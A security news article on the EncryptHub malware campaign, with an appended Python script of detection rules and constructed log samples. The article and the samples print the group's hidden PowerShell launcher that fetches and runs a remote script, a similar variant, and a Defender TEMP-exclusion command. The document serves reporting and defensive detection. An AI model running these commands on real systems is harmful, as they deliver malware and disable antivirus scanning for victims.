A cybercriminal group known as EncryptHub has compromised approximately 600 organizations through a multi-stage malware campaign. Outpost24's KrakenLabs researchers were able to map the group's tactics in unusual depth because the threat actor made operational security mistakes that inadvertently exposed critical elements of its infrastructure.

EncryptHub targets users of popular applications by distributing trojanized versions of software such as QQ Talk, WeChat, Microsoft Visual Studio 2022, and Palo Alto GlobalProtect. These applications were signed with code-signing certificates to appear legitimate, including one registered to "HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY", which has since been revoked. As of February 4th, 2025, the group began signing with a new certificate registered to "Encrypthub LLC", further demonstrating its evolving tactics. The attackers have also leveraged third-party distribution channels, including a pay-per-install service called "LabInstalls" that operates via a Telegram bot, allowing them to expand their reach and automate the deployment of malicious payloads to unsuspecting victims.

The multi-stage attack begins with the execution of a PowerShell command that downloads the first-stage payload and runs it in memory:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-RestMethod -Uri 'hxxps://encrypthub[.]us/encrypthub/fickle/payload.ps1' | Invoke-Expression"

The campaign then employs several layers of PowerShell scripts to gather system data, exfiltrate valuable information, execute evasion techniques, and deploy information stealers. The initial payload is responsible for stealing sensitive data including messaging sessions, crypto wallets, password manager files, and VPN sessions. The third stage employs an HTML loader that instructs Windows Defender to exclude the TEMP folder from scans and then downloads additional scripts. EncryptHub's kill chain shows the progression from initial execution through multiple stages to final payload deployment.

KrakenLabs found that EncryptHub prioritizes the credential logs stolen from victims based on cryptocurrency ownership, corporate network affiliation, and the presence of VPN software, indicating deliberate targeting of the most valuable victims. The group is also developing "EncryptRAT", a command-and-control panel that manages infections and sends remote commands, suggesting it may soon sell the tool to other threat actors.

Organizations are advised to implement multi-layered security strategies and continuous monitoring to protect against this evolving threat.

Author: Tushar, cyber security content editor.
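As an added example (not code from the article, from Outpost24, or from EncryptHub's own scripts), the following detection rules cover the two stages above that leave clear telemetry: the hidden, policy-bypassing PowerShell launcher that fetches a remote script and pipes it into Invoke-Expression, and the Windows Defender exclusion of the TEMP folder. The article does not say how the HTML loader sets the exclusion; the rules assume it is done with Add-MpPreference/Set-MpPreference, which also surfaces as a Microsoft Defender Event ID 5007 "configuration changed" record. All event lines below are constructed to resemble Sysmon Event ID 1 / Security 4688 command lines and Defender 5007 messages; they are not real telemetry, and the defanged hxxps URL is kept only because that is how the article prints it (live logs carry the real scheme).

```python
"""Detection rules for an EncryptHub-style PowerShell launcher and a Defender TEMP exclusion.

Added example; the event samples are constructed, not captured telemetry.
"""
import re

# Cmdlets (and aliases) that fetch a script body as a string.
_DOWNLOAD = re.compile(r"\b(Invoke-RestMethod|irm|Invoke-WebRequest|iwr|DownloadString)\b", re.I)
# Invoke-Expression or its alias, which executes that string in memory.
_IEX = re.compile(r"\b(Invoke-Expression|iex)\b", re.I)
_HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
_BYPASS = re.compile(r"-e(xecutionpolicy|p)?\s+bypass", re.I)
# Assumed mechanism for the exclusion: Add-/Set-MpPreference -ExclusionPath <path>.
_EXCL_CMD = re.compile(r"\b(Add|Set)-MpPreference\b.*-ExclusionPath\s+(?P<path>[^\s;]+)", re.I)
# Defender 5007 messages list the changed registry value, e.g. ...\Exclusions\Paths\<path> = 0x0
_EXCL_5007 = re.compile(r"Exclusions\\Paths\\(?P<path>[^=\r\n]+?)\s*=", re.I)
# Any common temp-directory spelling (env var, %TEMP%, or a trailing \Temp component).
_TEMP_PATH = re.compile(r"(\$env:temp|\$env:tmp|%temp%|\\temp\b)", re.I)


def classify_commandline(cmd: str) -> list[str]:
    """Return the rule names a process-creation command line triggers."""
    hits: list[str] = []
    low = cmd.lower()
    if "powershell" not in low and "pwsh" not in low:
        return hits
    if _DOWNLOAD.search(cmd) and _IEX.search(cmd):
        # Remote script fetched and executed without touching disk; hidden window
        # plus execution-policy bypass raises the severity.
        sev = "high" if (_HIDDEN.search(cmd) and _BYPASS.search(cmd)) else "medium"
        hits.append(f"ps_download_and_execute:{sev}")
    m = _EXCL_CMD.search(cmd)
    if m and _TEMP_PATH.search(m.group("path")):
        hits.append("defender_temp_exclusion")
    return hits


def classify_defender_event(event_id: int, message: str) -> list[str]:
    """Rules for Microsoft-Windows-Windows Defender/Operational events."""
    if event_id != 5007:  # 5007 = antivirus configuration changed
        return []
    m = _EXCL_5007.search(message)
    if m and _TEMP_PATH.search(m.group("path")):
        return ["defender_temp_exclusion_5007"]
    return []


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Apply the rules to a list of event dicts and return (index, rule) findings."""
    findings: list[tuple[int, str]] = []
    for i, ev in enumerate(events):
        if "cmd" in ev:
            rules = classify_commandline(ev["cmd"])
        else:
            rules = classify_defender_event(ev["event_id"], ev["message"])
        findings.extend((i, r) for r in rules)
    return findings


# Constructed sample events (not real logs): two launcher variants, three benign or
# near-miss command lines, and two Defender configuration-change messages.
CONSTRUCTED_EVENTS = [
    {"cmd": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
            "\"Invoke-RestMethod -Uri 'hxxps://encrypthub[.]us/encrypthub/fickle/payload.ps1' | Invoke-Expression\""},
    {"cmd": "powershell.exe -ep bypass -w hidden -c \"iex (iwr 'hxxps://example.invalid/s.ps1')\""},
    {"cmd": r'powershell.exe -Command "Get-ChildItem C:\Temp | Measure-Object"'},
    {"cmd": r"powershell.exe -Command \"Add-MpPreference -ExclusionPath 'C:\Program Files\VendorAgent'\""},
    {"cmd": 'powershell.exe -NoProfile -Command "Add-MpPreference -ExclusionPath $env:TEMP"'},
    {"event_id": 5007, "message": r"Microsoft Defender Antivirus Configuration has changed. "
                                  r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\victim\AppData\Local\Temp = 0x0"},
    {"event_id": 5007, "message": r"Microsoft Defender Antivirus Configuration has changed. "
                                  r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\VendorAgent = 0x0"},
]

if __name__ == "__main__":
    for idx, rule in scan(CONSTRUCTED_EVENTS):
        print(f"event[{idx}] -> {rule}")
```

The launcher rule deliberately keys on the download-then-execute pairing rather than on the specific domain, so the group's later infrastructure changes do not silence it; the exclusion rules flag only temp-directory paths, so a vendor agent excluding its own install folder is not reported.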
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 11 Mar 2025 07:30:06 +0000